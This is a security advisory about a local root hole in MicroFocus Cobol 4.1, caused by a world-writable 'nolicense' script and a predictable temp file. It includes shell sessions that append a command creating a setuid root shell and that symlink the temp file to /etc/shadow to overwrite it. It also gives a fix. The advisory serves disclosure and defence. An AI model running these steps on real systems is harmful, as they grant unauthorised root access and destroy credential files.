COMMAND

    Cobol

SYSTEMS AFFECTED

    Microfocus Cobol

PROBLEM

    Dixie  Flatline  found  following.   If  the  AppTrack  feature is
    enabled, the  default install  of MicroFocus  Cobol 4.1  (Merant's
    commercial  suite  of  cobol  utilities)  contains a security hole
    which can lead to root compromise.

    In the default  install, /var/mfaslmf is  installed mode 777,  and
    /var/mfaslmf/nolicense  is  installed  mode  666.   nolicense also
    contains the following:

        # Append into a logfile
        if test ! -f /var/mfaslmf/USERLOG
        then
                touch /var/mfaslmf/USERLOG
                chmod 666 /var/mfaslmf/USERLOG
        fi
        echo `date`:No license  $* >> /var/mfaslmf/USERLOG
        
        #mail a specified user (commented out by default. substitute the user
        name)
        echo `date`:No license  $* > /var/mfaslmf/tmpmess
        # mail -s "No AS license"  user-name  < /var/mfaslmf/tmpmess
        rm /var/mfaslmf/tmpmess

    This presents two major types of problem:
    * Because of the permissions on nolicense, unprivileged users  can
      edit  the  file  to  insert  arbitrary commands into the script.
      Then,  if  AppTrack  is  enabled  (see  below)  and  the trigger
      condition occurs (again, see  below), that code can  be executed
      with superuser privileges.
    * The   use   of    predictably-named   temporary   files   in   a
      world-writeable  directory  can  allow  local  users  to append,
      overwrite or destroy arbitrary  files, even if nolicense  itself
      is made non-world-writeable.

    Example of the first problem:

        $ id
        uid=500(echo8) gid=10(users)
        $ cat >> /var/mfaslmf/nolicense
        /bin/cp /bin/ksh /tmp; chmod 4755 /tmp/ksh
        ^D
        
        # create a condition under which all available AS licenses are used up.
        # This should not be difficult. When this occurs, /var/mfaslmf/nolicense
        # will run.
        
        $ ls -alt /tmp/ksh
        -rwsr-xr-x   1 root     other     186356 Dec 26 17:04 /tmp/ksh
        $  /tmp/ksh
        # id
        uid=500(echo8) gid=10(users) euid=0(root)
        #

    Example of the second:

        $ id
        uid=500(echo8) gid=10(users)
        $ cd /var/mfaslmf
        $ ln -s /etc/shadow tmpmess
        
        # Again, create a condition under which nolicense will run. This
        # example will overwrite /etc/shadow.
        
        $ cat /etc/shadow (would need to done as root, but you get the point...)
        Tue Dec 26 17:08:45 EST 2000:No license
        $

    These holes can  only be exploited  if the AppTrack  functionality
    is enabled.  This feature is off by default. 4.1 for Solaris/sparc
    is the only version tested.

SOLUTION

    Change  the  permissions  on  /var/mfaslmf  and rewrite nolicense.
    According  to  the  documentation,  nolicense  is  provided as "an
    example"  and  the  user  "can  edit  the nolicense script to your
    requirements."   IMO,  example  code  with  serious security holes
    should NOT be distributed. If you don't need this feature,  delete
    the script.   Regardless of  whether or  not you  need AppTrack to
    work, you should be able to change the permissions on /var/mfaslmf
    to something safer.